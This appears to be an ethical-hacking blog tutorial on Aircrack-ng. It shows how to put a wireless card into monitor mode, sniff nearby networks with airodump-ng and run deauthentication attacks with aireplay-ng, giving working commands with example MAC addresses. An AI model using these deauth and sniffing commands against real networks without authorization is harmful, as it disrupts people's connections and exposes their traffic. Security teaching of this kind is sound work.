Introduction:
In the domain of ethical hacking and cybersecurity, network monitoring and sniffing play a crucial role in understanding and securing wireless networks. Aircrack-ng, a powerful suite of tools, provides surplus functionalities to manage, monitor, and analyze network traffic. In this blog post, we'll delve into the methods to transition from managed to monitor mode, network sniffing basics, and the intriguing deauthentication attack.
Transitioning from Managed to Monitor Mode:
What are Managed and Monitor Modes?
Managed Mode is the default state for a wireless network interface card (NIC), functioning as a client that connects to a specific wireless network. In contrast, Monitor Mode is a specialized mode that enables passive wireless sniffing and allows the NIC to capture and analyze all wireless frames on a particular radio channel. This mode is crucial for tasks like network analysis and security assessments, providing the ability to inspect network traffic without actively participating in it.
Method 1 - Automatic:
Open your terminal and run
airmon-ng start wlan0to initiate monitor mode.Use
ifconfigto confirm the shift to wlan0mon (monitor mode).Check the mode with
iwconfig wlan0mon.To stop monitor mode, use
airmon-ng stop wlan0mon.Confirm the change with
ifconfigandiwconfig wlan0.
Method 2 - Manual:
Disable the connection with
ifconfig wlan0 down.Set the mode to monitor with
iwconfig wlan0 mode monitor.Bring up the connection with
ifconfig wlan0 up.Verify the mode change with
iwconfig wlan0.
Note: NetworkManager restart may be required to reconnect to the internet in Method 2, use service NetwokManager restart for that.
Network Sniffing Basics:
What is Network Sniffing?
Network sniffing is the intercepting and examining data packets within a computer network. During network sniffing, specialized tools capture and analyze the data packets, offering insights into network traffic, potential vulnerabilities, and overall communication between devices.
Enter monitor mode using
airmon-ng start wlan0.Gather information with
airodump-ng wlan0mon.BSSID : Router's MAC address.
PWR : Proximity indicator.
Beacons : Number of packets sent by routers.
CH : Router's channel.
ENC : Encryption type.
ESSID : Router's name.
Airodump Specific Target:
Use airodump-ng with specific parameters:
airodump-ng --channel --bssid --write <file_name> <interface> .
Example: airodump-ng --channel 12 --bssid 40:30:20:10 --write test1 wlan0mon
For analyzing the results you can view files with ls test1* and open the CSV file with cat test1-01.csv. Analyze results in Wireshark by opening the ".cap" file.
Deauthentication Attack:
What is a Deauthentication Attack?
A deauthentication attack is a cybersecurity method where an attacker intentionally disconnects a device from a Wi-Fi network by sending deauthentication frames. This disrupts the device's connection to the network, and while it can be used for legitimate security testing, unauthorized use poses risks.
Disconnect devices (i.e making them lose their connection with the router) using aireplay-ng:
aireplay-ng --deauth <#packets> -a <AP> <interface>
Example: aireplay-ng --deauth 10000 -a 10:20:30:40 wlan0mon
For targeted deauthentication:
aireplay-ng --deauth <#packets> -a <AP> -c <target> <interface>
Example: aireplay-ng --deauth 1000 -a 10:20:30:40 -c 00:AA:11:BB wlan0mon
Parameters:
-a : Access point (BSSID).
-c : Client's MAC address (Station).
Conclusion: Decoding Deauth and Respecting Ethical Boundaries
As we conclude our journey into deauthentication attacks and ethical hacking, it's essential to highlight the importance of conducting such activities responsibly and ethically. Unauthorized and malicious use of deauthentication attacks can lead to legal consequences and compromise the principles of ethical hacking. Always ensure that you have proper authorization before engaging in any form of security testing, and respect privacy and legal boundaries. Stay tuned for more insights on ethical hacking, where we'll continue to explore strategies and techniques within legal and ethical frameworks.